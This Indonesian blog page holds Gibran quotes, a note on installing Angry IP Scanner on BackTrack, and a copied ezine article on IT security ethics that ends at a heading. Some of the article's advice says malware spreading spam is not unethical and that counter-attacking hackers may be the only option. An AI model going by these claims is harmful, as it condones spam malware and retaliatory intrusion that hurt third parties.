Kata Mutiara-2-Kahlil Gibran

Diposting oleh fitri-ariyanto on Wednesday, December 31, 2008


"...pabila cinta memanggilmu... ikutilah dia walau jalannya berliku-liku... Dan, pabila sayapnya merangkummu... pasrahlah serta menyerah, walau pedang tersembunyi di sela sayap itu melukaimu..." (Kahlil Gibran)

"Jika manusia kehilangan sahabatnya, dia akan melihat sekitarnya dan akan melihat sahabat-sahabatnya datang dan menghiburnya... Akan tetapi apabila hati manusia kehilangan kedamaiannya, dimanakah dia akan menemukannya, bagaimanakah dia akan bisa memperolehnya kembali?" (Kahlil Gibran)

"...kuhancurkan tulang-tulangku, tetapi aku tidak membuangnya sampai aku mendengar suara cinta memanggilku dan melihat jiwaku siap untuk berpetualang" (Kahlil Gibran)


"Tubuh mempunyai keinginan yang tidak kita ketahui. Mereka dipisahkan karena alasan duniawi dan dipisahkan di ujung bumi. Namun jiwa tetap ada di tangan cinta... terus hidup... sampai kematian datang dan menyeret mereka kepada Tuhan..." (Kahlil Gibran)

"Jangan menangis, Kekasihku... Janganlah menangis dan berbahagialah, karena kita diikat bersama dalam cinta. Hanya dengan cinta yang indah... kita dapat bertahan terhadap derita kemiskinan, pahitnya kesedihan, dan duka perpisahan" (Kahlil Gibran)

"Aku ingin mencintaimu dengan sederhana... seperti kata yang tak sempat diucapkan kayu kepada api yang menjadikannya abu... Aku ingin mencintaimu dengan sederhana... seperti isyarat yang tak sempat dikirimkan awan kepada hujan yang menjadikannya tiada..." (Kahlil Gibran)

"Jika cinta tidak dapat mengembalikan engkau kepadaku dalam kehidupan ini... pastilah cinta akan menyatukan kita dalam kehidupan yang akan datang" (Kahlil Gibran)

"Setetes airmata menyatukanku dengan mereka yang patah hati; seulas senyum menjadi sebuah tanda kebahagiaanku dalam keberadaan... Aku merasa lebih baik jika aku mati dalam hasrat dan kerinduan... ketimbang jika aku hidup menjemukan dan putus asa" (Kahlil Gibran)

"Apa yang telah kucintai laksana seorang anak kini tak henti-hentinya aku mencintai... Dan, apa yang kucintai kini... akan kucintai sampai akhir hidupku, karena cinta ialah semua yang dapat kucapai... dan tak ada yang akan mencabut diriku dari padanya" (Kahlil Gibran)

"Kemarin aku sendirian di dunia ini, kekasih; dan kesendirianku... sebengis kematian... Kemarin diriku adalah sepatah kata yang tak bersuara..., di dalam pikiran malam. Hari ini... aku menjelma menjadi sebuah nyanyian menyenangkan di atas lidah hari. Dan, ini berlangsung dalam semenit dari sang waktu yang melahirkan sekilasan pandang, sepatah kata, sebuah desakan dan... sekecup ciuman" (Kahlil Gibran)
More aboutKata Mutiara-2-Kahlil Gibran

Install Angry Ip Scanner bag 2 [with *.rpm file]

Diposting oleh fitri-ariyanto on Monday, December 22, 2008

Tidak tahu kenapa, UbuntuQ pun aku tinggal n sekarang beralih ke Backtrack..(ya termotifasi aja pengen jadi admin jaringan.. tp hub apa ya sama backtrack..? :D)

ya menurut aku seh. dah banya tool yang tersedia di Backtrack, ya dari pada susah2 cari tool lagi...hehehe( dasar Lamer banget nda gue..?xexexe)

Ok, lanjut..
Pertama kali peke backtrack ane bingung juga, coz aplikasi2 nya blom aku kenal banget dan belom familiar dengan KDE Desktop. Mau cari Tool buat scanning network, apa ya yang harus aku gunakan...?( huuufff lamer lamer lamer n lameer.. heheh)

Tanpa pikir panjang langsung aja terpikirkan Tool ini, dolonlot dah...( donlut maksudnya hehe)

Untuk langkah2 nya..
Masuk Console di Backtrack..

bt ~ #

Kemudian masuk direktori file yang mau di Install

bt ~ # cd /root <-- contoh..
langkah selanjutnya ikutin ajah..oke bro..

bt ~ # rpm -i ipscan-3.0_beta3-1.i386.rpm --nodeps
bt ~ #

bila sukses maka instalasi tidak ada error nya...
Apasih perintah2 diatas..?
Ok aku kasih penjelasan dikit yang mungkin dapat memberi gambaran..

> rpm #Merupakan standar aplikasi untuk instasali paket2 RPM biasanya di Desktop KDE
> -i #Perintah untuk Instalasi. Untuk lebih jelasnya pake perintah rpm --help
>
ipscan-3.0_beta3-1.i386.rpm #Saya yakin pasti udah ngerti..heheh
> --nodeps #Instalasi tanpa depedensi..

untuk Info lebih lengkap coba aja pergi ke
http://www.tuxfiles.org/linuxhelp/rpminstall.html

sekian dulu yap tips dari saya.. semoga mampu membantu kawan-kawan sekalian

salam
fitri ariyanto [ mas lamer...hehehe ]
More aboutInstall Angry Ip Scanner bag 2 [with *.rpm file]

Dilema Etika IT Security Professional

Diposting oleh fitri-ariyanto on Friday, December 05, 2008

Artikel ini di-copy dari ezine Echo.or.id.
Berikut penjelasan.

-- -- -( Foreword )
Apa yang yang harus dilakukan oleh para professional di bidang keamanan jaringan komputer apabila mereka menghadapi beberapa masalah terutama yang menyangkut dengan nilai etis dari pekerjaan mereka? Saya akan mencoba membahas beberapa hal yang mungkin terjadi dan bahkan sedang anda alami saat ini dengan mencoba memberi solusi dari 2 sudut pandang yang berbeda.

Terkadang kita untuk menyelesaikan suatu masalah yang terjadi pada pekerjaan harus terbentur dengan nilai etis dari profesi kita sendiri yang membuat kita menghadapi suatu dilema, disatu sisi kita mau pekerjaan kita cepat selesai sedangkan dilain sisi kita harus mempertimbangkan nilai etis tersebut dalam menyelesaikannya. Anda bisa saja "kejam" untuk dapat segera menyelesaikannya atau anda bisa menggunakan "perasaan" untuk mencari solusi yang terbaik. Semuanya tergantung anda untuk memilih mana yang terbaik untuk anda.

-- -- -( Hacking )

Hacking sebuah komputer adalah bentuk dari serangan yang dilakukan oleh seseorang yang dikenal sebagai "hacker" untuk mencoba masuk/menyusupi kedalam sebuah system komputer yang tidak dimiliki nya. Termasuk didalamnya adalah "melewati" mekanisme yang sudah dibangun dari sebuah system atau jaringan dengan tujuan untuk mengambil data yang tersedia dan juga "resources" yang dimiliki oleh system tersebut.

Pada bagian ini kita akan berhadapan dengan dilema yang akan dihadapi apabila anda adalah seorang yang bertanggung jawab akan keamanan dan kelangsungan jaringan komputer tersebut dengan harus harus melakukan "perlawan" terhadap para "penyusup" tersebut. Kita akan bersinggungan dnegan dimana situasi yang memungkinkan untuk mencoba menyusup kedalam system yang tujuannya untuk keperluan bisnis atau edukasi (proof-of-concept). Kita juga akan mencoba mendiskusikan beberapa type dari metode "hacking" yang saling berhubungan satu dnegan yang lain. Ini meliputi masalah pada serangan terhadap system operasi (OS), membongkar "password" dan "spoofing".


--| Hacking for Business Warfare - apakah ini juga termasuk bagian dari bisnis?

Pimpinan anda memberi pernyataan bahwa dia berpikir situs saingan perusahaan anda dapat ditebak "URL"-nya (Uniform Resource Locator) dan menunjukkan kepada anda beberapa contoh. Dia lalu bertanya kepada anda apakah anda mampu mendapatkan informasi yang lebih banyak dari situs saingan perusahaan anda. Apakah anda akan melakukan "hacking" untuk pimpinan anda sehingga dapat bersaing atau sebuah keterpaksaan untuk dapat mempertahankan pekerjaan anda ?

Konservatif: melakukan "hacking" terhadap situs saingan perusahaan adalah suatu sikap yang tidak dapat diterima. Aksi ini sudah menjurus kepada perbuatan yang melanggar hukum. Beritahu kepada pimpinan anda bahwa anda tidak mau untuk melakukan "hacking" terhadap situs saingan perusahaan anda untuk alasan apapun.

Liberal: bisnis adalah perang dan memanfaatkan teknologi yang ada untuk dapat berhasil atau mampu bersaing adalah hal yang wajar-wajar saja. Bila anda tetap berpegang pada hukum teknologi informasi (IT), anda tidak melakukan sesuatu yang salah. Anda dapat dengan yakin bahwa saingan perusahaan anda juga melakukan hal yang sama pada perusahaan tempat anda bekerja.

saran
-------------------

Ketika pejabat senior meminta untuk melakukan tindakan ilegal tersebut, jangan langsung dikerjakan. Selalu pertimbangkan hasil atau akibat yang akan ditimbulkan apabila anda melakukannya dan tetap berpegang teguh pada prinsip kerja anda. Jangan menempatkan diri anda atau perusahaan anda dalam bahaya atau "membunuh" nilai etis untuk bisa tetap bekerja ditempat anda.

---------------------| Giving in to Distributed Denial of Service "Hacktortionist" – apakah anda membayarnya?

Seorang hacker menghubungi "Chief Executive Officer" (CEO) dari perusahaan anda dan meminta untuk melakukan pembayaran dengan jumlah yang lumayan besar atau dia aakan melakukan penghancuran total terhadap jaringan system komputasi diperusahaan anda bekerja. Jika perusahaan anda tidak membayar, maka "hacker" tersebut akan melakukan serangan "Distributed Denial of Service" (DDoS). Serangan ini akan membuat kerugian yang jauh lebih besar daripada perusahaan anda memberikan jumlah uang yang diminta oleh "hacktortionist" tersebut jika berhasil. CEO perusahaan anda menanyakan kepada anda, sebagai orang yang bertanggung jawab atas kelangsungan system komputasi beserta jaringan diperusahaan anda, apa yang akan anda rekomendasikan untuk merespon ancaman tersebut. Apa yang akan anda katakan kepadanya ?

Konservatif: sebagai orang yang bertanggung jawab atas kelangsungan system dan jaringannya diperusahaan anda. Sebuah serangan DDoS akan membuat system menjadi "down" dan biaya yang dikeluarkan dari permintaan si "hacktortionist" jauh lebih besar. Kemungkinan besar kerusakan pada "peripheral" juga terjadi sewaktu dalam proses DDoS. Walaupun ini kedengaran tidak etis, sarankan kepada CEO untuk membayar permintaan si "hacker" dan segera hubungi pihak yang berwenang untuk melacak keberadaan mereka untuk diproses secara hukum.

Liberal: jangan dibayar !!. Orang yang mengaku-ngaku (copycat) dari "hacker" yang mempunyai "nama besar" akan terus mencoba untuk mengambil keuntungan dari perbuatan "hacker" yang pertama. Berhubung anda telah diperingatkan oleh "hacker" tersebut, segera saja amankan system dan minta bantuan tambahan untuk proses penyelamatan system dan juga untuk melacak dan mengejar si "hacker" tersebut. Segera laporkan ancaman ini kepada pihak yang berwajib.

saran

-------------------

Perusahaan menyerah kepada "hacktortionist" dikarenakan 2 alasan utama. Alasan pertama, biaya untuk perbaikan system dan jaringan dari proses DDoS jauh lebih lebih besar daripada yang harus dibayar kepada si "hacktortionist" tersebut. Alasan kedua, reputasi bisnis perusahaan anda akan hancur didepan media massa apabila hasil dari serangan tersebut disampaikan kepada publik. Ini terutama menyangkut data pribadi yang disimpan oleh perusahaan seperti data kartu kredit atau hal yang bersifat pribadi untuk klien perusahaan.

-------------------

--| Hacking for Education - apakah ini benar hanya untuk pendidikan ?

Untuk beberapa "hacker", "hacking" adalah proses pembelajaran. Ini tentang mempelajari system operasi (OS) dan kelemahannya, bukan untuk mencari ketenaran untuk mereka atau melakukan aktifitas penghancuran seperti "Egomaniac Hackers" yang ingin dikenali nama alias mereka di media massa. Apakah tipe "hacking" ini dapat diterima daripada "hacker" yang ingin menjadi terkenal ??

Konservatif: tidak ada bentuk dari aktifitas hacking yang dapat diterima. Masuk kedalam rumah seseorang untuk menguji keahlian membuka jendela atau pintu anda dan melihat seberapa cepat atau "halus" anda melakukannya. Ini juga sama dengan "hacking". Motif tidak dapat dijadikan alasan untuk melakukannya.

Liberal: pada dasarnya "hacking" untuk pendidikan tidak dapat diterima. Tapi bagaimanapun juga, jika anda tidak mempunyai tujuan negatif ini secara etis dapat dimaafkan dari pada seseorang dengan tujuan yang jelek. Bahkan jika anda melaporkan celah keamanan yang anda dapatkan untuk dapat masuk kedalam system perusahaan itu, tetap saja perbuatan itu tidak benar secara etis.

saran

-------------------

Tidak ada pembenaran secara etis untuk melakukan "hacking" terhadap system orang/perusahaan lain. Hanya organisasi yang dipercaya yang dapat mengijinkan pegawai mereka untuk melakukan "hacking" terhadap system di pemerintahan maupun militer untuk kepentingan keamanan nasional. Didalam kasus ini, aksi yang anda lakukan mungkin terhormat. Didalam kasus lain, jauhi aktifitas "hacking" kecuali anda diberi wewenang untuk melakukan "penetration test" terhadap perusahaan anda sendiri.

-------------------


--| OS Attacks - pelacakan terhadap penyusup ?

Hacker dan pembuat worm sering kali membuat serangan terhadap system operasi (OS) Microsoft dikarenakan banyak hacker tidak simpati terhadap policy Microsoft. Apakah benar untuk menyerang sebuah perusahaan dikarenakan mereka mempunyai reputasi buruk di industri atau relasi mereka atau konsumen melihat mereka bersikap tidak etis?

Konservatif: hacking terhadap sesuatu sangatlah tidak etis tergantung pada perasaan yang membuat anda menyerang suatu perusahaan. Anda akan berhenti untuk berusaha "menghukum" perusahaan yang anda tidak sukai.

Liberal: bisnis adalah perang dan kadangkala untuk menyeimbangkan permainan dengan perusahaan yang tidak disenangi maka kita harus memainkan permainan itu juga. Bagaimanapun juga, anda perlu mempertimbangkan orang lain yang akan merasakan "efek"nya selain dari perusahaan tersebut. Hacking juga berefek terhadap pengguna dari perangkat lunak dan kemungkinan besar akan berakibat negatif terhadap mereka.


saran

-------------------

"Kerajaan" dari perangkat lunak microsoft sangatlah besar yang menyebabkan banyak hacker berusaha untuk menyerang atau mencari celah untuk menghancurkan mereka. Walaupun usaha hacking terhadap system komputasi perusahaan lain merupakan tindakan yang tidak etis (tidak simpatik), beberapa diantaranya akan mendapat penghormatan apabila mereka menyerang perusahaan yang tidak simpatik. Anda harus memutuskan mana yang terbaik untuk anda sendiri (which side you are standing against?).

-------------------

--| Cracking Screen Saver Password - haruskan atau tidak boleh ?

Anda harus melakukan patching terhadap sebuah komputer di jaringan komputer internal perusahaan anda dan mereka sedang keluar untuk makan siang, mereka menggunakan password pada screen saver mereka yang sangatlah mudah untuk anda "jebol". Apakah anda melakukannya ?

Konservatif: hindari menjebol password pada screen saver orang lain dan tunggu saja mereka kembali setelah jam makan siang usai. Ini akan memberi contoh yang buruk terhadap pengguna. Walaupun anda adalah orang yang bertanggung jawab untuk jaringan komputer internal perusahaan anda, yang lain mungkin mempunyai cukup pengetahuan dan akses yang seperti anda akan mencoba melakukan seperti yang anda lakukan saat ini.

Liberal: Menjebol password di screen saver bukan suatu masalah besar, cukup masuk kedalam system dan segera selesaikan apa yang akan anda selesaikan. Ini sering terjadi, sering kali anda harus melakukan proses update setelah jam kerja, mau tidak mau anda harus melakukannya juga. Karyawan yang lain harus memahami ini adalah bagian dari tugas anda.

saran

-------------------

Sebagai orang yang bertanggung jawab akan kelangsungan jaringan komputer internal di perusahaan anda, anda harus dapat memberi suatu contoh yang bagus untuk ditiru. Dalam banyak kasus, sangat bijak jika anda memberi contoh yang bagus dikarenakan anda tidak menjebol password orang lain. Bagaimanapun juga, ketika anda harus menyelesaikan pekerjaan anda, anda harus melakukannya saat itu juga.

-------------------

--| Spoofing - apakah ini mempunyai tujuan ?

Spoofing terhadap IP sering kali terjadi didalam system yang aman oleh super hackers yang mempunyai tujuan tidak untuk merusak system tersebut. Mereka hanya mencoba untuk menjadi "security zen". Apakah tipe spoofing seperti ini dapat diterima dikarenakan mereka tidak berencana untuk merusak system yang anda dan bahkan menunjukkan kelemahan system yang ada pada anda supaya anda dapat segera memperbaikinya?

Konservatif: Spoofing dalam segala bentuk adalah aktifitas tidak dapat ditoleransi. Bahkan jika tidak untuk merusak. Ini bukan tempat anda untuk menunjukkan dimana celah keamanan didalam system orang lain. Terlebih lagi jika untuk dikenali sebagai seorang "security zen".

Liberal: Ada sesuatu yang baik tentang spoofing untuk dikenali sebagai "security zen". Tipe aktifitas ini akan membantu para pengembang untuk mengenali secara dini kelemahan keamanan system. Selama tidak terjadi kerusakan, ini akan mencegah kemungkinan terjadinya kerusakan pada masa yang akan datang.

saran

-------------------

Para "zen" senang untuk dapat lebih pintar dari sesama "zen", ini adalah suatu permainan bagi mereka. Terkadang permainan ini dapat menolong mengenali kelemahan system terhadap system perusahaan yang mereka pegang. Aktifitas ini juga terkadang mengkonsumsi terlalu banyak sumber daya dan energi yang ada, yang dimana pada titik paling buruk, akan menyebabkan kerusakan secara tidak disengaja.

-------------------

-- -- -( Penetration Test )-

"Penetration testings" secara etis adalah proses hacking yang legal dan melakukan "probing" terhadap suatu system informasi perusahaan dan jaringannya untuk meliha apakah terdapat potensi terhadap kelemahan keamanan atau celah keamanan yang dapat di eksploitasi oleh "penyusup". Metode "penetration testing" melibatkan sebuah investigasi di semua fitur keamanan dari sebuah system. "Penetration tester" akan mencoba untuk mengelabui keamanan dari mencoba untuk memasuki system dan jairngan. Tester akan mensimulasikan seorang hacker dengan menggunakan cara menyerang, metode dan alat yang sama dengan untuk sebuah simulasi serangan nyata. Setelah selesai, penetration tester akan membuat sebuah laporan akan celah keamanan dan menyarankan prosedur untuk implementasi agar dapat membuat system menjadi lebih aman.


--| Testing Security Vulnerability - bersediakah anda membantu ?

Seorang karyawan di departemen IT mau melakukan pengecekan terhadap tingkat celah keamanan komputasi perusah. Didalam proses, dia mendapatkan celah keamanan yang cukup besar. Dia tidak mau untuk mendapat masalah dikarenakan aktifitas "hacking" terhadap system komputasi perusahaan, maka dia membuat "malicious script" dengan tujuan agar orang yang bertanggung jawab atas system komputasi perusahaan segera menyadari bahwa terdapat celah keamanan. Apakah sikap seperti ini dapat dianggap etis?

Konservatif: melakukan pengecekan terhadap keamanan system tanpa izin sangatlah tidak dapat ditoleransi. Membuat "malicious script" untuk menunjukkan celah keamanan adalah sesuatu yang gila. Dia tidak hanya membahayakan perusahaan tetapi juga tidak bersedia untuk memberitahu kepada yang bertanggung jawab akan apa yang telah ditemukannya. Ini dapat berdampak pada prospek karir dia dan masa depan perusahaan.

Liberal: walaupun melakukan sebuah pengecekan system tanpa disertai izin telah menyalahi aturan perusahaan, tapi dalam kasus ini itu sangat informatif dan menjukkan inisiatif. Dia harus berhenti pada poin itu dan mempresentasikan hasil temuannya kepada yang bertanggung jawab. Dia telah menyalahi aturan dikarenakan membuat "malicious script" untuk menunjukkan akan celah keamanan yang ada.

saran

-------------------

Berusaha membantu staff yang bertanggung jawab untuk menemukan kelemahan pada system perusahaan dapat menimbulkan bahaya yang lebih besar dari pada untuk pencegahannya. Sangat dianjurkan untuk menghindari membantu staff yang bertanggung jawab. Dikarenakan mereka adalah ahli dan anda bukan. Jika anda menemukan celah keamanan, segera laporkan kepada staff yang bertanggung jawab. Jangan pernah eksekusi "malicious script" terhadap perusahaan anda sendiri dengan alasan apapun, walaupun tujuan anda adalah baik.

-------------------

Don't Be Affraid to Attack Your Own Network (or Products).

As a security professional, you should encourage the security analysis of hardware and software technologies that you use on your network or in your organization. Of course, it must be clearly defined that such activities should only take place on test and development systems and products, not live network components.

Set up test networks and product configurations in your laboratory and allow employees to look for security vulnerabilities. Reward them for their success. It will strengthen the security of the organization and at the same time foster creativity, education, open-mindedness, and competitive spirit.

Incorporating third-party security audits of your network configuration or product development lifecycle can also help to discover previously overlooked vulnerabilities. Having a fresh set of eyes can go a long way. Its frustrating, but typical, to watch corporations introduce new technologies onto their live network without testing them. They don’t understand exactly what threats they are protecting against and why. Do not be afraid to explore. Try to break your product, software, or networktheres no harm in that. Fix the problems and try again. Be proactive. Dont wait for a malicious attacker to find the problems for you.

-- Joe Grand

President & CEO

Grand Idea Studio, Inc.


--| Appropriate Hacking to Determine Weakness - mengerti apa yang anda lakukan

Anda baru saja menyelesaikan sebuah training tentang hacking, melatih kemampuan dengan materi training yang baru saja anda selesaikan, anda memulai untuk mencoba "memasuki" keamanan system komputasi perusahaan anda untuk melihat apakah terdapat celah keamanan. Apakah tindakan ini dapat diterima jika anda adalah staff yang bertanggung jawab atas keamanan komputasi dan jaringan komputasi perusahaan anda ?

Konservatif: walaupun tujuan anda adalah untuk melakukan pengecekan terhadap integritas dari system, yang dimana ada didalam pengawasan anda, hacking dapat membuat kerusakan. Sejak anda anda hanya mengambil training, anda mungkin saja belum memenuhi standard untuk dapat melakukan sebuah pengecekan celah keamanan tanpa harus menyebabkan kerusakan yang tidak perlu pada system yang seharusnya anda lindungi. Jika anda ingin melakukannya, sewalah seorang konsultan yang mempunyai pengalaman dan mampu untuk melakukannya.

Liberal: sebagian dari tugas anda sebagai staff yang bertanggung jawab atas keamanan system komputasi dan jaringan komputasi perusahaan anda adalah melakukan pengecekan celah keamanan dari system yang anda lindungi. Mulailah dengan pengecekan yang mudah yang anda tahu "recovery" nya apabila terjadi sesuatu yang tdiak diinginkan. Lalu mulailah dengan perlahan dari situ sehingga anda mampu untuk melakukan pengecekan celah keamanan yang sesungguhnya.

saran

-------------------

Melakukan pengecekan keamanan system yang dimana anda bertanggung jawab untuk melindunginya adalah sebuah pekerjaan yang menantang. Pastikan anda tahu dengan pasti apa yang anda lakukan ketika melakukan hacking terhadap system. Jika anda adalah pemula, mulailah dengan perlahan atau biarkan pekerjaan itu kepada orang yang mampu melakukannya tanpa menempatkan system itu sendiri kedalam bahaya. Bila anda merasa pengetahuan anda sudah cukup, lakukan beberapa test dasar pada lab. Komputasi perusahaan anda dan bukan terhadap system perusahaan anda yang sedang berjalan.

-------------------


--| Failure of Penetration testing Software - salah siapa ?

Perangkat lunak yang anda beli untuk melakukan sebuah pengecekan celah keamanan dari system anda kelihatannya berhasil sampai sebuah serangan membuat system komputasi perusahaan anda menjadi tidak berfungsi. Produk ini tidak dapat mencari kelemahan dari yang dilancarkan oleh "penyusup". Apakah ini salah dari vendor ataukah salah dari sumber daya manusianya sendiri untuk melakukan pengecekan keamanan system.

Konservatif: anda harus melakukan minimal dua tipe pengecekan keamanan system untuk dapat memastikan integritas dari system tersebut. Latihan yang paling baik adalah melakukannya dengan orang yang mampu melakukannya dengan baik (professional) juga dengan menggunakan aplikasi yang dibuat khusus untuk melakukan test penetrasi.

Liberal: mintalah kembali uang anda ditempat anda membeli aplikasi tersebut. Itu sudah sangat jelas bahwa aplikasi itu tidak melakukan tugasnya dengan baik. Sekarang anda harus memulai semuanya dari awal lagi dan belilah sebuah aplikasi atau menyewa jasa dari orang yang mempunyai pekerjaan sebagai "specialized security professional" untuk melakukan test penetrasi tersebut.


saran

-------------------

Percaya sepenuhnya terhadap satu aplikasi adalah sebuah resep menuju bencana. Tidak semua aplikasi dapat memenuhi standard tersebut. Pastikan anda telah melakukan penelitian sebelum membelinya. Jangan letakkan keamanan system anda ditangan para marketing. Ambillah beberapa waktu dan cobalah untuk bertanya, melihat referensi dan benar-benar tahu apa yang anda beli sehingga anda dapat mempunyai asumsi bahwa ini adalah solusi yang efektif untuk keperluan keamanan informasi yang dibutuhkan perusahaan anda. Akan selalu baik jika anda menggabungkan penggunakaan aplikasi dan sumber daya manusia, terutama didalam kasus test penetrasi.

-------------------

-- -- -( Viruses and Worms )-

Virus dan "worms" adalah perwujudan dari "compiled malicious script" yang dirancang untuk membuat system tidak berdaya atau bahkan menghancurkannya. Ada banyak tipe dari virus dan "worms" itu sendiri. Programmer membuat satu jenisnya setiap hari. Beberapa, sebagai contoh "Code Red", sangat brutal. Sedangkan yang lain mungkin hanya sekedar "penggembira". Spam juga merupakan sebuah bentuk dari "malicious action" yang dimana berkembang sangat cepat dikarenakan potensi marketing yang didapatkan.

--| Virus Development for Profit - apakah ini dapat diterima ?

Pembuat worm dan virus mengambil keuntungan dari "compiled malicious code" mereka melalui spam, beberapa ahli mengatakan bahwa ada hubungan antara para pembuat virus tersebut dengan spammer. Apakah secara etis dapat ditolerir untuk mendapatkan keuntungan dengan membuat "compiled malicious script" untuk pendistribusian spam?

Konservatif: pengembangan spam atau semacam virus untuk keuntungan dari sesuatu yang jelas sekali salah. Dan itu juga ilegal dan seharusnya tidak dapat ditoleransi dalam keadaan apapun juga.

Liberal: membuat virus untuk kepentingan marketing seperti spam merusak reputasi programmer tersebut; bagaimanapun juga, tindakan itu tidak etis. Terdapat beberapa aturan hukum dibeberapa negara untuk mengatur e-mail yang tidak diinginkan, jika programmer "spam" mengikuti aturan hukum yang berlaku, maka tindakan mereka tidak dapat dilarang tapi juga dapat diterima.

saran

-------------------

Membuat "malicious code" yang membuat spam memenuhi kotak e-mail bukanlah suatu pekerjaan yang membanggakan, tapi tidak juga melanggar nilai etis, kecuali itu dapat menyebabkan kerusakan terhadap system penerimanya. Bagaimapun juga, kita hidup dengan sales yang mendatangi rumah ke rumah untuk menawarkan produk mereka dan itu juga termasuk spam. Hukum juga bervariasi dibeberapa negara, sehingga spam mungkin suatu hal yang dapat diterima didalam keperluan bisnis, dan tidak seorangpun mempunyai hak untuk menghentikannya.

-------------------

--| System Chrashes - haruskah anda melakukan format kembali terhadap Hard Drive?

Sebuah virus membuat komputer menjadi tidak berfungsi pada ruangan salah seorang pejabat senior di kantor anda dan mereka memberitahu bahwa anda dapat melakukan apa saja untuk membuat komputer itu kembali bisa digunakan. Kerusakan itu jelas dan tidak ada yang dapat anda lakukan untuk memperbaikinya pada saat itu. Anda tidak dapat melakukan "backup"" sehingga anda tidak mempunyai pilihan lain lagi selain melakukan format kembali hard drive-nya. Ketika pejabat senior itu kembali, mereka menyalahkan anda dan berkata bahwa anda tidak berhak untuk menghapus semua data yang ada didalam hard drive tersebut dan akan berusaha membuat anda untuk dipecat. Apakah ini kesalahan anda?

Konservatif: ketika melakukan format kembali sebuah "hard drive" untuk seorang pejabat senior atau siapapun juga untuk alasan apapun juga, anda seharusnya menunggu mereka untuk kembali sehingga anda bisa menjelaskan apa yang terjadi dan tidak berakhir menjadi "kambing hitam". Sejak system di komputer itu benar-benar tidak dapat berfungsi lagi, tidak ada yang dapat anda lakukan untuk merubahnya. Bagaimanapun juga anda tetap salah dikarenakan telah melakukan format kembali hard drive tersebut tanpa melakukan konsultasi terlebih dahulu dengan pejabat senior tersebut. Walaupun kegagalan system bukan kesalahan anda, tetapi anda telah menempatkan diri untuk menjadi seorang "kambing hitam".

Liberal: anda bukanlah orang yang patut disalahkan. Pejabat senior itu tentu akan membuat anda dipecat. Dia mempunyai "kuasa" untuk melakukannya, mungkin saja dia tidak dapat mengerti apa yang terjadi secara teknis. Dan tetap saja anda akan disalahkan walaupun anda tidak melakukan suatu kesalahan.

saran

-------------------

Mengantisipasi kesalahan adalah sesuatu yang rumit ketika itu berhubungan dengan teknologi. Sangat sedikit orang yang mengerti dari kerumitan teknologi dan bagaimana seorang "penyerang" dapat "mempengaruhi" komputer. Bila anda berusaha untuk menjelaskan keadaan ini sejak mereka memang tidak mengertinya, mereka mungkin tidak dapat memahami apa yang terjadi maka mereka akan berasumsi bahwa anda telah bertindak ceroboh. Sejak anda yang membuat kesalahan dengan melakukan format kembali tanpa konsultasi terlebih dahulu maka anda sendiri yang membuat diri anda berada dalam bahaya. Pejabat senior membuat banyak kesalahan; "mengambil" virus itu dan menyalahkan anda.

Bila anda masih tetap bekerja dikantor itu, buatlah prosedur yang formal pada form pengunduran diri ketika anda harus melakukan format kembali hard drive seseorang. Pada masa yang akan datang ini akan membantu anda untuk menghindari konsekuensi yang buruk.

-------------------

--| Attacking Attackers - haruskah anda melakukan penyerangan ?

Anda menemukan dan berhasil mengidentifikasikan seseorang yang telah melakukan hacking terhadap system anda. Apakah benar bahwa anda harus memberi mereka "pelajaran" dan melakukan hacking terhadap mereka, atau mengirimkan mereka virus yang sangat brutal?

Konservatif: sangatlah tidak benar untuk menggunakan "kekerasan" untuk membalas pada seseorang yang menyerang system anda. Ini hanya akan berakibat pada saling serang yang tidak akan pernah berakhir. Hubungi mereka di telepon atau hampiri mereka dan coba untk menangani keadaan ini dengan cara yang benar, yang dimana tidak akan berakibat serangan lanjutan pada system dimana anda bertanggung jawab atasnya. Dokumentasikan semua penemuan anda jika dalam suatu kasus anda akan melanjutkan ke pengadilan untuk memproses secara hukum kasus tersebut.

Liberal: terkadang satu-satunya cara agar "hacker" bisa mengerti keadaan ini, berikan mereka sebuah "pukulan" telah dengan sebuah virus yang sangat merusak dan berusaha untuk menghancurkan system mereka. Maka, dia tidakakan dapat lagi menyerang anda.

saran

-------------------

Seorang staff IT dapat menggunakan banyak taktik ketika harus berhadapan dengan penyusupan keamanan. Dalam banyak kasus, bertindak menyerang bukan merupakan suatu ide yang bagus karena anda kemungkinan akan mendapatkan masalah lain. Bagaimanapun juga, mungkin dalam beberapa pertimbangan penyerangan merupakan satu-satunya pilihan yang ada

-------------------

--| Bypassing Alerts - bukan suatu ide yang bagus.

Perangkat lunak yang anda gunakan untuk melihat integritas dan keamanan dari system yang membuat terlalu banyak peringatan, sehingga anda dengan segera melihat laporannya setiap hari dan berusaha menangani apakah itu peringatan yang benar atau salah. Jika itu memang peringatan yang benar dan sebuah virus menyerang system. Apakah anda anda salah dikarenakan tidak melakukan pengecekan dengan teliti, ataukah perusahaan perangkat lunak yang anda gunakan membuat terlalu banyak kesalahan sehingga sangatlah sulit untuk anda menentukan mana peringatan yang salah dan mana peringatan yang benar?

Konservatif: anda memang salah pada keadaan ini, walaupun peringatan itu kadang bersifat acak, dengan hanya melihat mereka semuanya sangatlah sia-sia dikarenakan anda tidak memperhatikan dengan teliti dan mengasumsikan bahwa mereka tidak tentu. Beberapa peringatan akan menjadi peringatan yang salah. Sudah merupakan kewajiban anda untuk melakukan pengecekan dengan teliti untuk mengantisipasi peringatan mana yang harus direspon dan mana yang harus tidak diperhatikan. Anda secara dasar telah salah dikarenakan tidak memperdulikannya dan sewaktu virus datang menyerang maka sudah pasti itu kesalahan anda.

Liberal: anda tidak salah, tetapi perusahaan perangkat lunak tersebut yang salah. Membuat suatu produk yang sulit dan tidak menentu untuk digunakan sangatlah tidak menolong dalam mengamankan suatu system. Peringatan seharusnya lebih terfokus dan tidak secara umum dan dapat membantu staff untuk melakukan pekerjaan mereka dan bukan mempersulitnya.

saran

-------------------

Kasus diatas merupakan suatu dilema, keduanya (vendor dan staff) salah. Vendor salah dikarenakan alat mereka tidak dapat mengantisipasi secara pasti dan terlalu umum, sedangkan staff salah dikarenakan mereka sangatlah malas.

-------------------


-- -- -( Encryption )-

Enkripsi adalah proses dari enkoding atau pengacakan data teks yang membuatnya susah buat seseorang untuk melihat isi asli dari data tersebut ketika dikirimkan dengan pengecualian penerima yang sebenarnya, sebuah algoritma enkripsi secara rumit menggunakan level dari proteksi yang disediakan oleh enkripsi. Enkripsi melindungi email, mengamankan transaksi "on-line", situs "File Transfer Protocol" (FTP), dan banyak lagi.

--| Sending Unencrypted Documents - haruskah itu terjadi ?

